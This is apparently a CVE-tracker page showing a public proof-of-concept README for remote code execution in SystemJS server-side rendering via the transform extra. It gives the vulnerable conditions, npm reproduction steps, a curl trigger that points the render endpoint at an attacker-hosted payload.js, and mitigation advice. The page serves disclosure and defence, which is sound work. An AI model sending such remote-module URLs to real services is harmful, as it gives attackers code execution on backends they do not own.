5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-36229
README.md
Rendering markdown...
POC / PUBLIC-POC.md MD
⬇ Raw GitHub ✕ Close 
# SystemJS Transform SSR Remote Code Execution PoC

## Summary

A backend server-side rendering application that enables SystemJS `dist/extras/transform.js` can execute attacker-controlled JavaScript inside the Node.js process when it imports a remotely influenced module URL.

This repository is for authorized security research and local reproduction only. Do not use it against systems you do not own or have explicit permission to test.

The vulnerable pattern is not SystemJS usage by itself. The issue appears when a server-side application combines all of the following:

1. SystemJS is used in a backend Node.js SSR workflow.
2. `dist/extras/transform.js` is enabled.
3. A remote user can influence the URL passed to `System.import()`.
4. The imported URL points to attacker-controlled JavaScript.

In that configuration, the transform extra fetches the remote module source and evaluates it in the backend process.

## Impact

Successful exploitation gives code execution with the privileges of the SSR service account. This local PoC demonstrates impact safely by creating `/tmp/pwned` and writing a proof file at `/tmp/pwned/systemjs-ssr-rce.txt`.

## Local Reproduction

Install dependencies:

```bash
npm install
```

Start the attacker-controlled module server:

```bash
npm run attacker
```

Start the vulnerable SSR server in another terminal:

```bash
npm run ssr
```

Trigger the server-side import:

```bash
curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1'
```

Expected result:

```text
/tmp/pwned
/tmp/pwned/systemjs-ssr-rce.txt
```

The proof file contains:

```text
ssr payload executed in backend node process
```

For repeated tests in the same SSR process, change the `run=` value, for example `run=2`, because SystemJS caches imported modules by URL.

## Mitigation

Do not enable `dist/extras/transform.js` for untrusted or remotely influenced module URLs. Server-side code should import only trusted local modules or modules from explicitly allowlisted origins. Treat dynamic SSR component URLs, plugin URLs, theme URLs, widget URLs, preview URLs, and import-map entries as code execution surfaces.